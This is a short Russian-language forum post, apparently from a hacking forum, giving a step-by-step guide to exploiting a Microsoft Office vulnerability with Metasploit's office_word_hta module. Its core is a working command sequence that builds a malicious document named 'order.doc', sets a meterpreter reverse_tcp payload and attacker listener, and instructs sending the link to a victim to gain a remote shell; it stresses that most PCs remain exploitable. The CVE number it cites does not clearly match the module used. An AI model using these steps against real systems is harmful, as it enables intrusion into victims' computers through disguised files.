Юзаем новую уязвимость в MS Office

AMRakm

Интересующийся
Интересующийся
AMRakm

AMRakm

Интересующийся
Интересующийся
Сообщения
54
Реакции
57
Эксплуатация уязвимости Microsoft Office CVE-2017-11826
Давайте посмотрим, как получить активную сессию meterpreter на удаленном хосте (Windows 8.1, Windows 7, Windows Server 2008). Для этого мы используем скрипт на Python, который генерирует файл RTF. Все необходимое включено в Metasploit Framework.

Соответствующий модуль создает вредоносный RTF — если открыть его в уязвимых версиях Word, выполнится код. Уязвимость состоит в том, что объект OLE может сделать запрос HTTP(S) и выполнить код HTA в ответ.

Приступим к эксплуатации

> use exploit/windows/fileformat/office_word_hta
> set srvhost 192.168.0.106
> set payload windows/meterpreter/reverse_tcp
> set filename order.doc
> set lhost 192.168.0.106
> exploit




Выделенная красным ссылка должна быть доставлена на целевой хост.


Если по ней перейти и запустить скачанный файл, откроется активная сессия meterpreter.


Набираем sysinfo, чтобы убедиться, что это победа.


Вывод
Мы изучили серьезную уязвимость, которая вовсю эксплуатируются в нашей среде. В новой версии Office баг уже в той или иной мере закрыт патчами и имеет некоторые ограничения, но 90% ПК используют предыдущие версии Office и уязвимость еще долгое время будут оставаться актуальной.
 

Сверху Снизу